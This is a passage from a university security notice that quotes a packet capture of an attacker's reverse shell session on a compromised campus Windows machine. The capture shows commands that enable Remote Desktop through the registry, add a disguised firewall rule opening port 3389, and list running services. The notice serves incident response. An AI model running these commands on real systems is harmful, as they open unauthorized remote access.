> Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
>
>
> T 2017/01/18 02:46:44.733944 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> reg.exe ADD
> "HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal
> Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
>
>
> T 2017/01/18 02:46:45.104427 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:46:45.104905 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> The operation completed successfully...
> .
> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>
> T 2017/01/18 02:46:45.432785 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:46:56.087756 188.132.176.26:4000 ->
> 128.111.28.118:20138 [AP]
> netsh advfirewall firewall add rule name = "Windows Service Host"
> dir=in action=allow protocol=TCP localport=3389
>
>
> T 2017/01/18 02:46:56.088487 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> netsh advfirewall firewall add rule name = "Windows Service Host"
> dir=in action=allow protocol=TCP localport=3389
>
>
> T 2017/01/18 02:46:56.596211 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:46:59.117911 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> Ok..
> .
>
> T 2017/01/18 02:46:59.432046 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:46:59.432624 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> .
> .
> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>
> T 2017/01/18 02:46:59.761298 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:47:16.188439 188.132.176.26:4000 ->
> 128.111.28.118:20138 [AP]
> net start
>
>
> T 2017/01/18 02:47:16.189037 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> net start
>
>
> T 2017/01/18 02:47:16.385997 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:47:16.427758 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> These Windows services are started:.
>
>
> T 2017/01/18 02:47:16.428404 128.111.28.118:20138 ->
> 188.132.176.26:4000 [A]
> .
> Adobe Acrobat Update Service.
> AMD External Events Utility.
> Apple Mobile Device.
> Application Experience.
> Application Information.
> Background Intelligent Transfer Service.
> Base Filtering Engine.
> Bonjour Service.
> Certificate Propagation.
> COM+ Event System.
> Computer Browser.
> Credential Manager.
> Cryptographic Services.
> DCOM Server Process Launcher.
> Desktop Window Manager Session Manager.
> DHCP Client.
> Diagnostic Policy Service.
> Diagnostic Service Host.
> Diagnostics Tracking Service.
> Distributed Link Tracking Client.
> DNS Client.
> Function Discovery Provider Host.
> Function Discovery Resource Publication.
> Group Policy Client.
> Human Interface Device Access.
> IKE and AuthIP IPsec Keying Modules.
> IP Helper.
> iPod Service.
> IPsec Policy Agent.
> LMIGuardianSvc.
> LogMeIn.
> LogMeIn Maintenance Service.
> Microsoft Antimalware Service.
> Microsoft Network Inspection.
> Microsoft Office Click-to-Run Service.
> MT7 Registry Service.
> MT7 Serial Search Service.
> MySQL55.
> Network Connections.
> Network List Service.
> Network Location Awareness.
> Network Store Interface Service.
> Office Software Protection Platform.
> Offline Files.
> Parallels Networking Service.
> Parallels Virtualization Service.
> Plug and Play.
> Pml Driver HPZ12.
> PnP-X IP Bus Enumerator.
> Portable Device Enumerator Service.
> Power.
> Print Spooler.
> Program Compati
>
> T 2017/01/18 02:47:16.428408 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> bility Assistant Service
>
> T 2017/01/18 02:47:16.625665 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:47:16.626533 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> .
> Quality Windows Audio Video Experience.
> Remote Access Connection Manager.
> Remote Desktop Configuration.
> Remote Desktop Services.
> Remote Desktop Services UserMode Port Redirector.
> Remote Procedure Call (RPC).
> Routing and Remote Access.
> RPC Endpoint Mapper.
> Secondary Logon.
> Secure Socket Tunneling Protocol Service.
> Security Accounts Manager.
> Security Center.
> Server.
> Shell Hardware Detection.
> Skype C2C Service.
> SQL Server (SQLEXPRESS).
> SQL Server VSS Writer.
> SSDP Discovery.
> Superfetch.
> System Event Notification Service.
> Tablet PC Input Service.
> TabletServicePen.
> Task Scheduler.
> TCP/IP NetBIOS Helper.
> TeamViewer 11.
> Telephony.
> Themes.
> UPnP Device Host.
> User Profile Service.
> Wacom Consumer Touch Service.
> Windows App Certification Kit Fast User Switching Utility Service.
> Windows Audio.
> Windows Audio Endpoint Builder.
> Windows Driver Foundation - User-mode Driver Framework.
> Windows Event Log.
> Windows Firewall.
> Windows Font Cache Service.
> Windows Image Acquisition (WIA).
> Windows Management Instrumentation.
> Windows Media Player Network Sharing Service.
> Windows Presentation Foundation Font Cache 3.0.0.0.
> Windows Search.
> Windows Update.
> WinHTTP Web Proxy Auto-Discovery Service.
> Workstation.
> .
> The command completed successfully..
> .
> .
> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>
> ----------sample----------
> --
> E. Todd Atkins
> Enterprise Technology Services
> University of California, Santa Barbara http://www.security.ucsb.edu/
>
> **********************************************************************
> The NOC's list of network contacts is used to determine who should 
> receive email such as this. Please direct any requests for changes to 
> this list of network contacts to noc at ucsb.edu.
> **********************************************************************
>

--

Scott Kasai
User Support Specialist
Engineering Computing Infrastructure
University of California, Santa Barbara